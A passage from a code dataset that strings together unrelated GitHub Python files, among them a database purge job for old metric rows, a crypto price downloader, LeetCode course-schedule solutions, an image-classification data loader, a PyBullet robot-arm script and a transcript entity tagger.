\"\n \"will be purged. 
The metric data timestamps are assumed to be \"\n \"UTC.\"))\n\n\n args = parser.parse_args()\n\n\n if args.thresholdDays <= 0:\n parser.error(\"--threshold-days value must be greater than zero, but got {}\".format(\n args.thresholdDays))\n\n\n return args\n\n\n\ndef purgeOldMetricDataRows(thresholdDays):\n \"\"\" Purge rows from metric data table with timestamps that are older than\n the given number of days.\n\n :param int thresholdDays: Metric data rows with timestamps older than this\n number of days will be purged.\n\n :returns: number of rows that were deleted\n\n \"\"\"\n g_log.info(\"Estimating number of rows in table=%s older than numDays=%s\",\n schema.metric_data, thresholdDays)\n\n sqlEngine = htmengine.repository.engineFactory(htmengine.APP_CONFIG)\n\n selectionPredicate = (\n schema.metric_data.c.timestamp <\n sql.func.date_sub(sql.func.utc_timestamp(),\n sql.text(\"INTERVAL {:d} DAY\".format(thresholdDays)))\n )\n\n estimate = _estimateNumRowsToDelete(sqlEngine, selectionPredicate)\n\n g_log.info(\"Number of candidate old metric data rows to purge: estimate=%s\",\n estimate)\n\n if estimate == 0:\n return 0\n\n # NOTE: We'll be deleting in smaller batches to avoid \"Lock wait timeout\n # exceeded\".\n #\n # When the number of old rows is huge, if we try to delete them in a single\n # transaction, we get perpetually mired in the error \"Lock wait timeout\n # exceeded; try restarting transaction\". mysql/innodb provides the setting\n # `innodb_lock_wait_timeout` that may be overridden, but there isn't a good way\n # to estimate a value that guarantees success. Doing it in one transaction\n # also doesn't facilitate progress update, thus creating the perception that\n # the operation is \"stuck\".\n totalDeleted = 0\n\n while totalDeleted < estimate:\n # NOTE: we're dealing with a couple of issues here:\n #\n # 1. sqlalchemy core doesn't support LIMIT in delete statements, so we can't\n # use delete directly with LIMIT and ORDER BY\n # 2. 
MySql (5.6.21) doesn't support LIMIT & IN subqueries: \"This version of\n # MySQL doesn't yet support 'LIMIT & IN/ALL/ANY/SOME subquery\"\n #\n # So, we're going to stick with sqlalchemy, and break the operation into two\n # queries: get the candidate uid/rowid pairs, then delete matching rows\n\n limit = min(_MAX_DELETE_BATCH_SIZE, estimate - totalDeleted)\n\n uidRowidPairs = _queryCandidateRows(sqlEngine=sqlEngine,\n selectionPredicate=selectionPredicate,\n limit=limit)\n\n if uidRowidPairs:\n numDeleted = _deleteRows(sqlEngine=sqlEngine, uidRowidPairs=uidRowidPairs)\n else:\n # This could happen if something else deleted rows in our range\n break\n\n totalDeleted += numDeleted\n\n g_log.info(\"Purged %s old metric data rows [%s of %s]\", numDeleted,\n totalDeleted, estimate)\n\n\n g_log.info(\"Purged numRows=%s of estimated=%s old metric data rows from \"\n \"table=%s\", totalDeleted, estimate, schema.metric_data)\n\n return totalDeleted\n\n\n\n@sqlalchemy_utils.retryOnTransientErrors\ndef _estimateNumRowsToDelete(sqlEngine, selectionPredicate):\n \"\"\"\n :param sqlalchemy.engine.Engine sqlEngine:\n :param selectionPredicate: predicate for where clause that selects the desired\n rows for purging\n \"\"\"\n return sqlEngine.execute(\n sql.select([sql.func.count()])\n .where(selectionPredicate)).scalar()\n\n\n\n@sqlalchemy_utils.retryOnTransientErrors\ndef _queryCandidateRows(sqlEngine, selectionPredicate, limit):\n \"\"\"Query candidate uid/rowid pairss of metric data rows to delete.\n\n :param sqlalchemy.engine.Engine sqlEngine:\n :param selectionPredicate: predicate for where clause that selects the desired\n rows for purging\n :param int limit: max number of rows to delete\n\n :returns: sequence of matching uid/rowid pairs (may be empty)\n \"\"\"\n # Note: we order the result set to avoid creating holes in the data\n results = sqlEngine.execute(\n sql.select([schema.metric_data.c.uid, schema.metric_data.c.rowid])\n .where(selectionPredicate)\n .order_by(schema.metric_data.c.uid.asc(),\n schema.metric_data.c.rowid.asc())\n .limit(limit)\n ).fetchall()\n\n return tuple((str(row[0]), row[1]) for row in results)\n\n\n\n@sqlalchemy_utils.retryOnTransientErrors\ndef _deleteRows(sqlEngine, uidRowidPairs):\n \"\"\"Delete metric data rows with the given uid/rowid pairs\n\n :param sqlalchemy.engine.Engine sqlEngine:\n :param uidRowidPairs: sequence of uid/rowid pairs of metric data rows to\n delete\n\n :returns: number of rows actually deleted; this may be less than requested if\n something else deleted some of the requested rows\n \"\"\"\n return sqlEngine.execute(\n schema.metric_data.delete() # pylint: disable=E1120\n .where(\n sql.tuple_(schema.metric_data.c.uid, schema.metric_data.c.rowid).in_(\n uidRowidPairs))\n ).rowcount\n\n\n\n@logExceptions(g_log)\ndef main():\n\n try:\n try:\n args = _parseArgs(sys.argv[1:])\n except SystemExit as exc:\n if exc.code == 0:\n # Suppress exception logging when exiting due to --help\n return\n\n raise\n\n\n while True:\n purgeOldMetricDataRows(args.thresholdDays)\n\n g_log.info(\"Resuming in %s seconds...\", _PAUSE_INTERVAL_SEC)\n time.sleep(_PAUSE_INTERVAL_SEC)\n except KeyboardInterrupt:\n # Log with exception info to help debug deadlocks\n g_log.info(\"Observed KeyboardInterrupt\", exc_info=True)\n\n\n\nif __name__ == \"__main__\":\n LoggingSupport.initService()\n\n 
main()\n","repo_name":"bopopescu/numenta-apps-archived-htm.it-grokcli-htmitmobile","sub_path":"htmengine/htmengine/runtime/metric_garbage_collector.py","file_name":"metric_garbage_collector.py","file_ext":"py","file_size_in_byte":6765,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"32489618735","text":"\nimport pandas as pd\nimport pandas_datareader.data as web\n\nimport requests\nimport datetime\n\n\ndef download_crypto(freq, symbols, priceNumber):\n first = True\n main_url = 'https://min-api.cryptocompare.com/data/histo{}'.format(freq)\n\n for symbol in symbols:\n print('Downloading {}'.format(symbol), end='... ')\n url = main_url + '?fsym={}'.format(symbol) + '&tsym=EUR' + '&limit={}'.format(priceNumber) + '&aggregate=1'\n response = requests.get(url)\n inter = response.json()['Data']\n inter = pd.DataFrame(inter)[['close', 'time']]\n inter.columns = [symbol, 'time']\n inter['time'] = inter['time'].map(datetime.datetime.fromtimestamp)\n\n if first:\n data = inter\n first = False\n else:\n data = pd.merge(data, inter, on='time')\n\n print('done')\n\n return data.sort_values('time', ascending=False).set_index('time')\n\n\n\ndef download_data(symbols, start, end):\n first = True\n\n for symbol in symbols:\n try:\n print('Downloading {}'.format(symbol), end='... ')\n inter = web.DataReader(symbol, 'morningstar', start, end)[['Close']]\n inter.columns = [symbol]\n inter['Date'] = inter.index.get_level_values('Date')\n inter.reset_index(drop=True, inplace=True)\n\n if first:\n price = inter.copy(True)\n del inter\n first = False\n else:\n price = pd.merge(price, inter, on='Date')\n del inter\n print('done')\n\n except:\n print(\"failed ! \")\n\n return price.sort_values('Date', ascending=False).set_index('Date')\n","repo_name":"HugoooPerrin/Cryptocurrencies","sub_path":"utils/data_collector.py","file_name":"data_collector.py","file_ext":"py","file_size_in_byte":1689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"39488019399","text":"from collections import defaultdict\r\ndef canFinish(numCourses: int, g):\r\n\r\n h={}\r\n def has_circle(node):\r\n if h.get(node)==-1: #mrans proccessing\r\n return True\r\n if h.get(node)==0:\r\n return False\r\n h[node]=-1\r\n for nei in g[node]:\r\n if has_circle(nei):\r\n return True\r\n h[node]=0\r\n return False\r\n\r\n for i in range(numCourses):\r\n if has_circle(i):\r\n return False\r\n return True\r\nclass Solution:\r\n def findOrder(self, numCourses, prerequisites):\r\n g=defaultdict(set)\r\n for c,p in prerequisites:\r\n g[c].add(p) \r\n if not canFinish(numCourses, g):\r\n return []\r\n ans=[]\r\n dumped=set()\r\n def dump(node):\r\n if node in dumped:\r\n return\r\n for i in g[node]:\r\n dump(i)\r\n ans.append(node)\r\n dumped.add(node)\r\n for i in range(numCourses):\r\n dump(i)\r\n return ans\r\nprint(Solution().findOrder(2, [[1,0]]))","repo_name":"yigalirani/leetcode","sub_path":"210_Course_Schedule_II.py","file_name":"210_Course_Schedule_II.py","file_ext":"py","file_size_in_byte":1079,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26593531301","text":"# NumPy for numerical computing\nimport numpy as np\nnp.random.seed(123)\nimport random\nrandom.seed(123)\n\n# Pandas for DataFrames\nimport pandas as pd\npd.set_option('display.max_column', 100)\n\nimport os\nimport gc\nfrom skimage import io\nfrom skimage.transform import rescale, resize, 
downscale_local_mean\n\nfrom tags import Tags\n\nPLANET_KAGGLE_ROOT = '/data/planet-data/'\nif not os.path.exists(PLANET_KAGGLE_ROOT):\n PLANET_KAGGLE_ROOT = '/Users/jiayou/Documents/Kaggle Data/Amazon'\n\nN_TAGS = 17\nN_TRAIN = 40479\nN_TEST_T = 40669\nN_TEST_F = 20522\nN_TEST = N_TEST_T + N_TEST_F\n\ndef load_train_image(n, tif=False, dbg=False):\n if tif:\n path = os.path.abspath(os.path.join(PLANET_KAGGLE_ROOT, 'train-tif-v2', 'train_{}.tif'.format(n)))\n else:\n path = os.path.abspath(os.path.join(PLANET_KAGGLE_ROOT, 'train-jpg', 'train_{}.jpg'.format(n)))\n if os.path.exists(path):\n img = io.imread(path)\n# if dbg:\n# plt.figure()\n# plt.imshow(img)\n return img\n # if you reach this line, you didn't find the image you're looking for\n print('Load failed: could not find image {}'.format(path))\n\ndef load_test_image(n):\n path = None\n if n < N_TEST_T:\n path = os.path.abspath(os.path.join(PLANET_KAGGLE_ROOT, 'test-jpg', 'test_{}.jpg'.format(n)))\n else:\n path = os.path.abspath(os.path.join(PLANET_KAGGLE_ROOT, 'test-jpg-additional', 'file_{}.jpg'.format(n - N_TEST_T)))\n if os.path.exists(path):\n return io.imread(path)\n # if you reach this line, you didn't find the image you're looking for\n print('Load failed: could not find image {}'.format(path))\n\n\ncalib_params = np.array(\n [[ 4953.06200497, 4238.24180873, 3039.04404623, 6387.04264221],\n [ 1692.87422811, 1528.24629706, 1576.04566834, 1804.99976545]]\n)\n\ndef preprocess_image(img):\n img = img.astype('float16')\n# img = downscale_local_mean(img, (4, 4, 1))\n\n if img.shape[2] == 3:\n # jpg\n img = 2 * (img / 255 - 0.5)\n else:\n # tif\n for i in range(4):\n img[:,:,i] = (img[:,:,i] - calib_params[0,i]) / 1500\n\n return img\n\ndef get_training_data(file_ids, tif=False, dbg=False, verbose=False):\n if verbose:\n print('Getting {} training images...'.format(len(file_ids)))\n X_train = np.zeros((len(file_ids), 256, 256, 4 if tif else 3)).astype('float16')\n for i in range(len(file_ids)):\n X_train[i,:,:,:] = preprocess_image(load_train_image(file_ids[i], tif=tif, dbg=dbg))\n if verbose and i % 100 == 0:\n print('Got {} images'.format(i+1))\n if verbose:\n print('Done')\n\n y_train = Tags().y_train(file_ids)\n if dbg:\n print(y_train)\n\n return (X_train, y_train)\n\ndef get_test_data(file_ids):\n X_train = np.array([preprocess_image(load_test_image(fname)) for fname in file_ids])\n return X_train\n\ndef augment(im, orient = None):\n shape = im.shape\n if len(shape) == 4:\n im = im.reshape((shape[1], shape[2], shape[3]))\n\n if orient is None:\n mirror = random.randint(0, 1)\n rotate = random.randint(0, 3)\n else:\n mirror = orient % 2\n rotate = int(orient / 2)\n\n im = np.rot90(im, rotate, (0, 1))\n if mirror:\n im = np.flip(im, 1)\n\n return im.reshape(shape)\n\nclass Data:\n def __init__(self, tif=False, toy=None, train=None, fold=5):\n n = N_TRAIN\n if toy is not None:\n n = toy\n self.n_train = n\n if train is None:\n train = range(fold)\n self.fold = fold\n\n self.c = 4 if tif else 3\n\n print('Loading data...')\n self.X = [0] * self.fold\n self.y = [0] * self.fold\n for i in train:\n if tif:\n self.X[i] = np.load('X.{}.npy'.format(i))\n self.y[i] = np.load('y.{}.npy'.format(i))\n else:\n self.X[i], self.y[i] = get_training_data(\n [x for x in range(n) if x % self.fold == i], tif=tif, verbose=True)\n print('Loaded fold {}.'.format(i))\n print('Loading done')\n\n # randomly generate randomly-augmented training data\n # output shape: (batch_size, 256, 256, 3)\n def gen_train(self, batch_size, val=0):\n while 1:\n f = 
val\n while f == val:\n f = random.randint(0, self.fold - 1)\n yield self.data_from_fold(f, batch_size)\n\n # randomly generate validation data\n # output shape: (batch_size, 256, 256, 3)\n def gen_val(self, batch_size, val=0):\n f = val\n while 1:\n ids = np.random.randint(0, len(self.y[f]), size=batch_size).tolist()\n ids.sort()\n yield (self.X[f][ids,:,:,:], self.y[f][ids,:])\n\n # generate augmented training data in order\n # output shape: (batch_size * 8, 256, 256, 3)\n def gen_train_augmented(self, batch_size):\n n = self.n_train\n start = 0\n while start < n:\n end = min(start + batch_size, n)\n\n shape = list(self.X[0].shape)\n shape[0] = 8 * (end - start)\n shape = tuple(shape)\n aug = np.zeros(shape)\n for i in range(end - start):\n cur = start + i\n f = cur % self.fold\n k = int(cur / self.fold + 1e-3)\n for orient in range(8):\n aug[8 * i + orient,:,:,:] = augment(self.X[f][k,:,:,:], orient=orient)\n yield aug\n\n start = end\n\n # generate augmented validation data in order\n # output shape: (batch_size * 8, 256, 256, 3)\n def gen_val_augmented(self, batch_size, val=0):\n f = val\n n = len(self.y[f])\n start = 0\n while start < n:\n end = min(start + batch_size, n)\n\n shape = list(self.X[f].shape)\n shape[0] = 8 * (end - start)\n shape = tuple(shape)\n aug = np.zeros(shape)\n for i in range(end - start):\n cur = start + i\n for orient in range(8):\n aug[8 * i + orient,:,:,:] = augment(self.X[f][cur,:,:,:], orient=orient)\n yield aug\n\n start = end\n\n # generate test data in order\n def gen_test(self, batch_size, n=None):\n if n is None:\n n = N_TEST\n start = 0\n while start < n:\n end = min(start + batch_size, n)\n yield get_test_data(range(start, end))\n start = end\n\n # generate augmented test data in order\n def gen_test_augmented(self, batch_size, n=None):\n if n is None:\n n = N_TEST\n start = 0\n while start < n:\n end = min(start + batch_size, n)\n\n original = get_test_data(range(start, end))\n shape = list(original.shape)\n shape[0] *= 8\n shape = tuple(shape)\n aug = np.zeros(shape)\n for i in range(end - start):\n for orient in range(8):\n aug[8 * i + orient,:,:,:] = augment(original[i,:,:,:], orient=orient)\n yield aug\n\n start = end\n\n # return $batch_size randomly-augmented images from a fold\n def data_from_fold(self, f, batch_size):\n ids = np.random.randint(0, len(self.y[f]), size=batch_size).tolist()\n ids.sort()\n X = np.zeros((len(ids), 256, 256, self.c))\n for i in range(len(ids)):\n X[i,:,:,:] = augment(self.X[f][ids[i],:,:,:])\n return (X, self.y[f][ids,:])\n\n def get_fold(self, f=0):\n return (self.X[f], self.y[f])\n\n def consolidate(self, pred):\n return pred.mean(axis=0)\n\n def gen_mask(self, g, select):\n for x, y in g:\n for i in range(N_TAGS):\n if not i in select:\n y[:,i] = 0\n yield (x, y)\n\n\n\n\ndef get_training_file_ids(draw_size):\n file_ids = np.random.randint(0, N_TRAIN, size=draw_size).tolist()\n for i in range(len(file_ids)):\n if file_ids[i] % 5 == 0:\n file_ids[i] = (file_ids[i] + 1) % N_TRAIN\n return file_ids\n\ndef get_calib_params():\n draw_size = 1000\n file_ids = get_training_file_ids(draw_size)\n ref_color = [[], [], [], []]\n\n for i in range(draw_size):\n current_im = io.imread(os.path.join(PLANET_KAGGLE_ROOT, 'train-tif-v2', 'train_{}.tif'.format(file_ids[i])))\n flatten_im = current_im.reshape((-1, 4))\n for j in range(4):\n ref_color[j] += flatten_im[:, j].tolist()\n\n ref_color = np.array(ref_color)\n ref_param = np.zeros((2, 4))\n ref_param[0,:] = ref_color.mean(axis = 1)\n ref_param[1,:] = ref_color.std(axis = 
1)\n return ref_param","repo_name":"kylinorange/kaggle-planet","sub_path":"notebooks/utils/data.py","file_name":"data.py","file_ext":"py","file_size_in_byte":8622,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"43680475947","text":"'''\nCreated on Jun 25, 2021\n\n@author: jiadongc\n'''\nimport imageio\nwriter = []\nfilenames = []\nfor i in range(0,8):\n filenames.append(str(i))\nprint(filenames)\nfor filename in filenames:\n image = imageio.imread(\"C://Users//jiadongc//classes//myResearch//prelim//gif_figs2//\"+filename+\".png\")\n writer.append(image)\nexportname = \"output11.gif\"\nkargs = { 'duration': 0.8 }\nimageio.mimsave(exportname, writer, 'GIF', **kargs)","repo_name":"dd-debug/examples_chemical_potential_diagrams","sub_path":"save_gifs.py","file_name":"save_gifs.py","file_ext":"py","file_size_in_byte":427,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4814409157","text":"import pybullet as p\nimport time\nimport pybullet_data\nimport os, inspect\nimport numpy as np\nimport copy\nimport math\nimport random\n\nclass tm700:\n\n def __init__(self, urdfRootPath=pybullet_data.getDataPath(), timeStep=0.01):\n self.urdfRootPath = urdfRootPath\n self.timeStep = timeStep\n self.maxVelocity = .35\n self.maxForce = 200.\n self.fingerAForce = 2\n self.fingerBForce = 2.5\n self.fingerTipForce = 2\n self.useInverseKinematics = 1\n self.useSimulation = True\n self.useNullSpace = 21\n self.useOrientation = 0\n self.tmEndEffectorIndex = 5\n self.tmGripperIndex = 7\n # lower limits for null space\n # self.ll = [-.967, -2, -2.96, 0.19, -2.96, -2.09, -3.05]\n self.ll = [-10, -10, -10, -10, -10, -10, -10]\n\n # upper limits for null space\n self.ul = [.967, 2, 2.96, 2.29, 2.96, 2.09, 3.05]\n self.ul = [10, 10, 10, 10, 10, 10, 10]\n # joint ranges for null space\n # self.jr = [5.8, 4, 5.8, 4, 5.8, 4, 6]\n self.jr = [10, 10, 10, 10, 10, 10, 10]\n # restposes for null space\n self.rp = [0, 0, 0, 0.5 * math.pi, 0, -math.pi * 0.5 * 0.66, 0]\n # joint damping coefficents\n self.jd = [\n 0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001, 0.00001,\n 0.00001, 0.00001, 0.00001, 0.00001\n ]\n self.reset()\n\n def reset(self):\n\n robot = p.loadURDF(\"../Gazebo_arm/urdf/tm700_robot_clean.urdf\")\n self.tm700Uid = robot\n p.resetBasePositionAndOrientation(self.tm700Uid, [0.0, 0.0, 0.0], # position of robot, GREEN IS Y AXIS\n [0.000000, 0.000000, 1.000000, 0.000000]) # direction of robot\n self.jointPositions = [\n 0.0, 0.0, -0, -0, -0.5, -1, -1.57, 0,\n #0.09196934635505513, -1.2212455855949105, -0.5971444720831858, -0.6572313840869254, -1.4991674243259474, 0.0,\n 0.0, 0.0, -0, -0, -0, -0, -0, -0.0, -0.0, -0.0]\n\n self.numJoints = p.getNumJoints(self.tm700Uid)\n for jointIndex in range(1,self.numJoints):\n p.resetJointState(self.tm700Uid, jointIndex, self.jointPositions[jointIndex])\n p.setJointMotorControl2(self.tm700Uid,\n jointIndex,\n p.POSITION_CONTROL,\n targetPosition=self.jointPositions[jointIndex],\n force=self.maxForce)\n\n # print('Link:', p.getLinkState(self.tm700Uid, jointIndex))\n\n # print(p.getJointInfo(robot, jointIndex))\n\n\n #\n # self.trayUid = p.loadURDF(os.path.join(self.urdfRootPath, \"tray/tray.urdf\"), 0.6400, #first 3: position, last 4: quaternions\n # 0.0000, 0.001, 0.000000, 0.000000, 1.000000, 0.000000)\n self.endEffectorPos = [0.0, 0.0, 0.0]\n self.endEffectorAngle = 0\n\n\n# BLOCK\n xpos = 0.55 # * random.random()\n ypos = 0.2 
# * random.random()\n ang = 3.14 #* random.random()\n orn = p.getQuaternionFromEuler([0, 0, ang])\n self.blockUid = p.loadURDF(os.path.join(self.urdfRootPath, \"block.urdf\"), xpos, ypos, 0.05,\n orn[0], orn[1], orn[2], orn[3])\n blockPos, blockOrn = p.getBasePositionAndOrientation(self.blockUid)\n print('BLOCK INFO:', blockPos, blockOrn)\n print('block:', self.blockUid)\n\n self.motorNames = []\n self.motorIndices = []\n\n for i in range(self.numJoints):\n jointInfo = p.getJointInfo(self.tm700Uid, i)\n qIndex = jointInfo[3]\n if qIndex > -1:\n #print(\"motorname\")\n #print(jointInfo[1])\n self.motorNames.append(str(jointInfo[1]))\n self.motorIndices.append(i)\n # print('motorindeces', self.motorIndices)\n\n def getActionDimension(self):\n if (self.useInverseKinematics):\n return len(self.motorIndices)\n return 6 #position x,y,z and roll/pitch/yaw euler angles of end effector\n\n def getObservationDimension(self):\n return len(self.getObservation())\n\n jointInfo = p.getJointInfo(self.tm700Uid, i)\n qIndex = jointInfo[3]\n\n def getObservation(self):\n observation = []\n state = p.getLinkState(self.tm700Uid, self.tmGripperIndex)\n pos = state[0]\n orn = state[1] #Cartesian orientation of center of mass, in quaternion [x,y,z,w]\n\n euler = p.getEulerFromQuaternion(orn)\n\n observation.extend(list(pos))\n observation.extend(list(euler))\n\n return observation\n\n def applyAction(self, motorCommands):\n\n #print (\"self.numJoints\")\n #print (self.numJoints)\n if (self.useInverseKinematics):\n\n dx = motorCommands[0]\n dy = motorCommands[1]\n dz = motorCommands[2]\n da = motorCommands[3]\n fingerAngle = motorCommands[4]\n state = p.getLinkState(self.tm700Uid, self.tmEndEffectorIndex) # returns 1. center of mass cartesian coordinates, 2. rotation around center of mass in quaternion\n actualEndEffectorPos = state[0]\n #print(\"pos[2] (getLinkState(tmEndEffectorIndex)\")\n #print(actualEndEffectorPos[2])\n\n self.endEffectorPos[0] = dx\n self.endEffectorPos[1] = dy\n self.endEffectorPos[2] = dz\n #\n self.endEffectorAngle = self.endEffectorAngle + da\n pos = [dx, dy, dz]\n orn = p.getQuaternionFromEuler([0, -math.pi, 0]) # -math.pi,yaw])\n\n if (self.useOrientation == 1): # FALSE\n jointPoses = p.calculateInverseKinematics(self.tm700Uid,\n self.tmEndEffectorIndex,\n pos,\n orn,\n jointDamping=self.jd)\n else:\n jointPoses = p.calculateInverseKinematics(self.tm700Uid, self.tmEndEffectorIndex, pos,residualThreshold= 0.01)\n print('POSES OF JOINTS', jointPoses)\n\n if (self.useSimulation):\n for i in range(self.tmEndEffectorIndex+1):\n\n p.setJointMotorControl2(bodyUniqueId=self.tm700Uid,\n jointIndex=i,\n controlMode=p.POSITION_CONTROL,\n targetPosition=jointPoses[i],\n targetVelocity=0,\n force=self.maxForce,\n maxVelocity=self.maxVelocity,\n positionGain=0.3,\n velocityGain=1)\n\n def print_joint_state(self):\n print(p.getLinkState(self.tm700Uid, self.tmEndEffectorIndex))\n # print(p.getJointInfo(self.tm700Uid, 7))\n\nif __name__ == '__main__':\n\n\n physicsClient = p.connect(p.GUI)#or p.DIRECT for non-graphical version\n\n tm700test = tm700()\n tm700test.reset\n p.setGravity(0,0,0)\n #tm700test.applyAction([0.67, 0.2, 0.05,0,0])\n tm700test.applyAction([0.55, 0.2, 0.05,0,0])\n for i in range (10000):\n p.stepSimulation()\n tm700test.print_joint_state()\n time.sleep(1./240.0)\n 
p.disconnect()\n","repo_name":"Tung-I/RoboticGrasper","sub_path":"unused_code/tm700_noinverse.py","file_name":"tm700_noinverse.py","file_ext":"py","file_size_in_byte":6853,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"13279774421","text":"from sklearn.model_selection import cross_val_score\nfrom sklearn.neural_network import MLPClassifier\nfrom sklearn.preprocessing import StandardScaler\nfrom sklearn.naive_bayes import GaussianNB\nfrom sklearn import svm\nfrom sklearn.metrics.pairwise import chi2_kernel\n\ndef crossLinear(dataset):\n X = dataset[0] # vecteur d'image\n y = dataset[1] # vecteur de classes\n \n clf = svm.SVC(kernel='linear', C=1)\n scores = cross_val_score(clf, X, y, cv=5)\n print(\"Linear : Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\n return scores \n\n\ndef crossChi2(dataset):\n X = dataset[0] # vecteur d'image\n y = dataset[1] # vecteur de classes\n\n clf = svm.SVC(kernel=chi2_kernel).fit(dataset[0],dataset[1])\n scores = cross_val_score(clf, X, y, cv=5)\n print(\"Chi2 : Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n\n return scores\n\n\ndef crossNW(dataset): \n X = dataset[0]\n y = dataset[1]\n\n mlp = MLPClassifier(hidden_layer_sizes=(25), max_iter=15000)\n\n scalar = StandardScaler()\n X = scalar.fit_transform(X)\n\n scores = cross_val_score(mlp, X, y, cv=5)\n \n print(\"NeuralNetwork : Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n return scores\n\ndef crossNB(dataset):\n X = dataset[0]\n y = dataset[1]\n\n clf = GaussianNB()\n\n scores = cross_val_score(clf, X, y , cv=5)\n\n print(\"Naive Bayse : Accuracy: %0.2f (+/- %0.2f)\" % (scores.mean(), scores.std() * 2))\n return scores\n \n\n","repo_name":"Roger-ELIAS/Apprentissage-Automatique","sub_path":"crossValidate.py","file_name":"crossValidate.py","file_ext":"py","file_size_in_byte":1508,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74901961973","text":"\nimport re\nfrom datetime import datetime\nimport spacy\nimport csv\nimport pandas\nfrom pandas import DataFrame\n\ndef parse_ner(text):\n nlp = spacy.load(\"de_core_news_sm\")\n doc = nlp(text)\n\n # more info can be extracted such as: e.start_char, e.end_char\n ents = [(e.text, e.label_) for e in doc.ents] # returns a list of tuples [(Zurich, LOC), (Ursula, PER) ...]\n return ents\n\ndef get_sec(time_str):\n time_str = time_str.replace(\"(\",\" \").replace(\")\",\" \").strip()\n if len(time_str.split(':')) == 2:\n m, s = time_str.split(':')\n return int(m) * 60 + int(s)\n else:\n h, m, s = time_str.split(':')\n return int(h)*3600 + int(m) * 60 + int(s)\n\ndef extract_unique_entities(text_split_on_timestamp, print=False):\n all_entities = dict()\n for count, paragraph in enumerate(text_split_on_timestamp):\n if count % 10 == 0:\n print(count)\n entities_found = parse_ner(paragraph)\n for ent in entities_found:\n all_entities[ent] = all_entities.get(ent, 0) + 1\n\n if print:\n with open('all_named_entities.csv', 'w') as f:\n for key in all_entities.keys():\n f.write(\"%s,%s,%s\\n\" % (key[0], key[1], all_entities[key]))\n\ndef extract_entities_per_paragraph(text_split_on_timestamp):\n\n entities_list_all_paragraphs = []\n for count, paragraph in enumerate(text_split_on_timestamp):\n if count % 10 == 0:\n print(count)\n entities_found = parse_ner(paragraph)\n entities_processed = []\n for entity in entities_found:\n name = entity[0]\n entities_processed.append(name)\n 
entities_names_concat = ';'.join(entities_processed)\n entities_list_all_paragraphs.append(entities_names_concat)\n\n return entities_list_all_paragraphs\n\ndef preprocess_text(paragraph):\n paragraph = paragraph.replace(\"[Anm. Transkription:\", \"(\").replace(\"]\",\")\").replace(\"(unv.)\", \"(?)\")\n return paragraph\n\ndef prepare_and_annotate_paragraphs(text_split_on_timestamp, res_timestamps):\n res_timestamps.insert(0, \"(00:00)\")\n print(len(text_split_on_timestamp), len(res_timestamps))\n preprocessed_paragraphs = []\n for paragraph in text_split_on_timestamp:\n preprocessed_paragraphs.append(preprocess_text(paragraph))\n entities_list_all_paragraphs = extract_entities_per_paragraph(text_split_on_timestamp)\n\n df = DataFrame({'Start': res_timestamps, 'Content': preprocessed_paragraphs, 'Entities': entities_list_all_paragraphs})\n df.to_excel(\"time_segmented_content_entities.xlsx\", sheet_name='sheet1', index=False)\n\ndef get_timestamps_statistics(res_timestamps):\n paragraph_lengths = []\n i, j = 0,1\n while j < len(res_timestamps):\n tdelta = get_sec(res_timestamps[j]) - get_sec(res_timestamps[i])\n paragraph_lengths.append(tdelta)\n j+=1\n i+=1\n print('\\n Timestamps statistics:')\n print(\"AVG diff length (s):\", sum(paragraph_lengths)/len(paragraph_lengths), paragraph_lengths)\n\ndef read_file(filename):\n with open(filename, 'r', encoding = 'utf-16') as file:\n text = file.read()\n\n # Remove all intermediate timestamps (usually appear together with a comment in the middle of a sentence/paragraph)\n text = re.sub(\"\\(unv., .{2}:.{2}\\)\", \"(?)\", text)\n text = re.sub(\", .{2}:.{2}]\", \"]\", text)\n\n text_split_on_timestamp = re.compile(r'\\(.{2}:.{2}\\)|\\(.{1}:.{2}:.{2}\\)').split(text)\n print(\"Nr paragraphs: \",len(text_split_on_timestamp))\n #extract_unique_entities(text_split_on_timestamp, print=True)\n\n res_timestamps = re.findall(r'\\(.{2}:.{2}\\)|\\(.{1}:.{2}:.{2}\\)', text)\n print(\"Nr timestamps: \", len(res_timestamps), res_timestamps)\n\n prepare_and_annotate_paragraphs(text_split_on_timestamp, res_timestamps)\n\n\nif __name__ == '__main__':\n filename = \"20192705_Pellaton_Ausdruckstanz_unkorrigiert.txt\"\n read_file(filename)\n","repo_name":"JelkeJL/Pellaton","sub_path":"data preparation/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"20866069377","text":"#!/usr/bin/env python3\n\nclass Solution(object):\n def hasLoop(self, course, course_to_prereq):\n \"\"\"\n Followers:\n Awndre\n cptwalrus\n alvin5How\n TheldOfAlan\n SimoncitoOwU\n andre_santoz\n \"\"\"\n to_visit = [course]\n seen = set()\n\n while to_visit:\n print(seen)\n # Get the course to visit\n current = to_visit.pop()\n\n if current in seen:\n print(\"Encountered a seen node\" + str(current))\n return True\n else:\n seen.add(current)\n\n # Queue up the dependencies\n for dep in course_to_prereq[current]:\n if dep not in to_visit:\n to_visit.append(dep)\n\n return False\n\n def canFinish(self, numCourses, prerequisites):\n \"\"\"\n Followers\n nillhiam\n :type numCourses: int\n :type prerequisites: List[List[int]]\n :rtype: bool\n \"\"\"\n course_to_prereq = {}\n\n for course in range(numCourses):\n course_to_prereq[course] = []\n\n for pair in prerequisites:\n course_to_prereq[pair[0]].append(pair[1])\n\n # Walk the depcourseendency path\n for course in course_to_prereq:\n loop = self.hasLoop(course, course_to_prereq)\n\n if loop:\n return False\n\n 
